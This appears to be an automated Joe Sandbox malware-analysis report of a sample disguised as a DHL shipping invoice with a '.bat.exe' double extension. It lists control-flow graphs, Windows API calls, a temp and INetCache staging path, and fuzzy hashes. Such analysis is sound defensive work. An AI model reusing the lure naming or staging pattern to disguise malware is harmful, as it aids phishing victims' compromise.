                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 582 406624-406644 GetSystemDirectoryW 583 406646 582->583 584 406648-40664a 582->584 583->584 585 40665b-40665d 584->585 586 40664c-406655 584->586 588 40665e-406691 wsprintfW LoadLibraryExW 585->588 586->585 587 406657-406659 586->587 587->588
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                      • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 589 4057f1-40583c CreateDirectoryW 590 405842-40584f GetLastError 589->590 591 40583e-405840 589->591 592 405869-40586b 590->592 593 405851-405865 SetFileSecurityW 590->593 591->592 593->591 594 405867 GetLastError 593->594 594->592
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                      • API String ID: 3449924974-3443045126
                                                                                                                                                                                                                                      • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                                      • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 595 405ddf-405deb 596 405dec-405e20 GetTickCount GetTempFileNameW 595->596 597 405e22-405e24 596->597 598 405e2f-405e31 596->598 597->596 600 405e26 597->600 599 405e29-405e2c 598->599 600->599
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,757C3420,004035D9), ref: 00405E18
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                                                                                                                                                                                                                      • nsa, xrefs: 00405DEC
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe", xrefs: 00405DDF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                      • API String ID: 1716503409-3301564132
                                                                                                                                                                                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                      • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 601 73a41777-73a417b6 call 73a41b5f 605 73a418d6-73a418d8 601->605 606 73a417bc-73a417c0 601->606 607 73a417c2-73a417c8 call 73a42352 606->607 608 73a417c9-73a417d6 call 73a42394 606->608 607->608 613 73a41806-73a4180d 608->613 614 73a417d8-73a417dd 608->614 615 73a4182d-73a41831 613->615 616 73a4180f-73a4182b call 73a42569 call 73a415b4 call 73a41272 GlobalFree 613->616 617 73a417df-73a417e0 614->617 618 73a417f8-73a417fb 614->618 619 73a41833-73a4187c call 73a415c6 call 73a42569 615->619 620 73a4187e-73a41884 call 73a42569 615->620 642 73a41885-73a41889 616->642 623 73a417e2-73a417e3 617->623 624 73a417e8-73a417e9 call 73a42aac 617->624 618->613 621 73a417fd-73a417fe call 73a42d37 618->621 619->642 620->642 635 73a41803 621->635 630 73a417e5-73a417e6 623->630 631 73a417f0-73a417f6 call 73a42724 623->631 632 73a417ee 624->632 630->613 630->624 641 73a41805 631->641 632->635 635->641 641->613 645 73a418c6-73a418cd 642->645 646 73a4188b-73a41899 call 73a4252c 642->646 645->605 648 73a418cf-73a418d0 GlobalFree 645->648 651 73a418b1-73a418b8 646->651 652 73a4189b-73a4189e 646->652 648->605 651->645 654 73a418ba-73a418c5 call 73a4153d 651->654 652->651 653 73a418a0-73a418a8 652->653 653->651 655 73a418aa-73a418ab FreeLibrary 653->655 654->645 655->651
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 73A41B5F: GlobalFree.KERNEL32(?), ref: 73A41DB2
                                                                                                                                                                                                                                        • Part of subcall function 73A41B5F: GlobalFree.KERNEL32(?), ref: 73A41DB7
                                                                                                                                                                                                                                        • Part of subcall function 73A41B5F: GlobalFree.KERNEL32(?), ref: 73A41DBC
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A41825
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 73A418AB
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 73A418D0
                                                                                                                                                                                                                                        • Part of subcall function 73A42352: GlobalAlloc.KERNEL32(00000040,?), ref: 73A42383
                                                                                                                                                                                                                                        • Part of subcall function 73A42724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73A417F6,00000000), ref: 73A427F4
                                                                                                                                                                                                                                        • Part of subcall function 73A415C6: wsprintfW.USER32 ref: 73A415F4
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423415300742.0000000073A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 73A40000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415272754.0000000073A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415327749.0000000073A44000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423415355677.0000000073A46000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_73a40000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 99945427941f5cae47bf800c0c864eed6adbbadb99e20351ea8444323a869ed2
                                                                                                                                                                                                                                      • Instruction ID: f59248be574dbfe42b61ece8c84034434c9e0bb77b18e6c89d0c5b50334755ab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99945427941f5cae47bf800c0c864eed6adbbadb99e20351ea8444323a869ed2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 844182725003049BDB119F6C9A86B9537A8BF09311F38657BED0B9A2DEDB7C8085CB61

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 658 402d44-402d6d call 406127 660 402d72-402d74 658->660 661 402d76-402d7c 660->661 662 402dec-402df0 660->662 663 402d98-402dad RegEnumKeyW 661->663 664 402d7e-402d80 663->664 665 402daf-402dc1 RegCloseKey call 406694 663->665 666 402dd0-402dde RegCloseKey 664->666 667 402d82-402d96 call 402d44 664->667 672 402de0-402de6 RegDeleteKeyW 665->672 673 402dc3-402dce 665->673 666->662 667->663 667->665 672->662 673->662
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$Enum
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                                                                                                                      • Opcode ID: c72d40a864b89179d6177807711ca710c6d7a48354557ea1e55874adbd4ea6b3
                                                                                                                                                                                                                                      • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72d40a864b89179d6177807711ca710c6d7a48354557ea1e55874adbd4ea6b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 675 4015c1-4015d5 call 402c41 call 405c3a 680 401631-401634 675->680 681 4015d7-4015ea call 405bbc 675->681 683 401663-402250 call 401423 680->683 684 401636-401655 call 401423 call 4062ba SetCurrentDirectoryW 680->684 689 401604-401607 call 40586e 681->689 690 4015ec-4015ef 681->690 696 402ac5-402ad4 683->696 697 40288b-402892 683->697 684->696 702 40165b-40165e 684->702 700 40160c-40160e 689->700 690->689 693 4015f1-4015f8 call 40588b 690->693 693->689 707 4015fa-4015fd call 4057f1 693->707 697->696 703 401610-401615 700->703 704 401627-40162f 700->704 702->696 708 401624 703->708 709 401617-401622 GetFileAttributesW 703->709 704->680 704->681 711 401602 707->711 708->704 709->704 709->708 711->700
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,757C3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,757C3420,00000000), ref: 00405C48
                                                                                                                                                                                                                                        • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                                                                                                                                                                                        • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                                                                                                                        • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes,?,00000000,000000F0), ref: 0040164D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes, xrefs: 00401640
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Livmoderens15\Skuespilforfatternes
                                                                                                                                                                                                                                      • API String ID: 1892508949-978686151
                                                                                                                                                                                                                                      • Opcode ID: ccc26fd8040a7d4b53b38cf61a52de36f24ca8f1ae9d4c3caa59a04d4873da4d
                                                                                                                                                                                                                                      • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccc26fd8040a7d4b53b38cf61a52de36f24ca8f1ae9d4c3caa59a04d4873da4d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 712 402032-40203e 713 402044-40205a call 402c41 * 2 712->713 714 4020fd-4020ff 712->714 724 40206a-402079 LoadLibraryExW 713->724 725 40205c-402068 GetModuleHandleW 713->725 715 40224b-402250 call 401423 714->715 721 402ac5-402ad4 715->721 722 40288b-402892 715->722 722->721 728 40207b-40208a call 406703 724->728 729 4020f6-4020f8 724->729 725->724 725->728 732 4020c5-4020ca call 405322 728->732 733 40208c-402092 728->733 729->715 737 4020cf-4020d2 732->737 735 402094-4020a0 call 401423 733->735 736 4020ab-4020be call 73a41777 733->736 735->737 745 4020a2-4020a9 735->745 740 4020c0-4020c3 736->740 737->721 741 4020d8-4020e2 call 40394a 737->741 740->737 741->721 746 4020e8-4020f1 FreeLibrary 741->746 745->737 746->721
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,757C23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                                        • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041DA00,757C23A0), ref: 0040537D
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 334405425-0
                                                                                                                                                                                                                                      • Opcode ID: 666f6d8ac427e58388e3d879615a983e5b51d40526e42ae90acfa13b1993aa0d
                                                                                                                                                                                                                                      • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 666f6d8ac427e58388e3d879615a983e5b51d40526e42ae90acfa13b1993aa0d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000002.00000002.423396785019.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396758425.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396814335.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423396874447.0000000000450000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000002.00000002.423397113724.0000000000453000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                                                                      • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
